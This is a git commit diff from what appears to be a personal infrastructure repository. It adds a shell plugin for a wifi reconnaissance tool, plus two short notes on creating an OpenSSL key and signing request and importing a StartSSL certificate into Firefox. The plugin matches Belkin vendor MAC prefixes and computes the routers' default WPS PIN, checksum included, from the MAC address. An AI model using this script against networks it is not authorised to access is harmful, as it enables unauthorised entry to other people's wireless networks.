summaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
-rwxr-xr-xrecon/inspect_wifi/plugins/11belkin_wps30
-rw-r--r--sites/create-startssl-cert/boot.krebsco.de.md19
-rw-r--r--sites/create-startssl-cert/startssl-web.md7
3 files changed, 56 insertions, 0 deletions
diff --git a/recon/inspect_wifi/plugins/11belkin_wps b/recon/inspect_wifi/plugins/11belkin_wps
new file mode 100755
index 00000000..65448ad0
--- /dev/null
+++ b/recon/inspect_wifi/plugins/11belkin_wps
@@ -0,0 +1,30 @@
+#!/bin/sh
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+parse_plugin_args "$@"
+
+if ! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B; then
+ echo "VENDOR MAC $VENDOR_MAC not affected"
+ exit 1
+fi
+
+calc_belkin(){
+ PRIVATE_MAC=${1}
+ p=$((0x$PRIVATE_MAC % 10000000))
+ wps_pin_checksum(){
+ pin=$1
+ accum=0
+ while [ $pin -ne 0 ];do
+ accum=$((accum + (3 * (pin % 10)) ))
+ pin=$((pin/10))
+ accum=$((accum + pin %10 ))
+ pin=$((pin/10))
+ done
+ echo $(( (10 - accum % 10) % 10))
+ }
+ printf "%07d%d" $p $(wps_pin_checksum $p)
+ return 0
+}
+
+printf "WPS-PIN: %s" $(calc_belkin ${PRIVATE_MAC})
diff --git a/sites/create-startssl-cert/boot.krebsco.de.md b/sites/create-startssl-cert/boot.krebsco.de.md
new file mode 100644
index 00000000..17c7d5f2
--- /dev/null
+++ b/sites/create-startssl-cert/boot.krebsco.de.md
@@ -0,0 +1,19 @@
+# generate key
+
+ $ openssl genrsa -out ~/boot.krebsco.de.key 2048
+ $ openssl req -new -sha256 -key ~/boot.krebsco.de.key -out ~/boot.krebsco.de.csr
+ Country Name (2 letter code) [AU]:XX
+ State or Province Name (full name) [Some-State]:
+ Locality Name (eg, city) []:
+ Organization Name (eg, company) [Internet Widgits Pty Ltd]:Krebsco
+ Organizational Unit Name (eg, section) []:
+ Common Name (e.g. server FQDN or YOUR name) []:boot.krebsco.de
+ Email Address []:root@krebsco.de
+
+ Please enter the following 'extra' attributes
+ to be sent with your certificate request
+ A challenge password []:
+ An optional company name []:
+
+ # everything besides public key will be ignored so do not bother
+ $ firefox https://www.startssl.com/
diff --git a/sites/create-startssl-cert/startssl-web.md b/sites/create-startssl-cert/startssl-web.md
new file mode 100644
index 00000000..57625542
--- /dev/null
+++ b/sites/create-startssl-cert/startssl-web.md
@@ -0,0 +1,7 @@
+# log into startssl
+
+## Firefox
+
+Preferences -> advanced -> certificates -> view certificates -> your certificates -> import -> choose //brain/auth/startss.crt
+
+url-open https://www.startssl.com/ -> click authenticate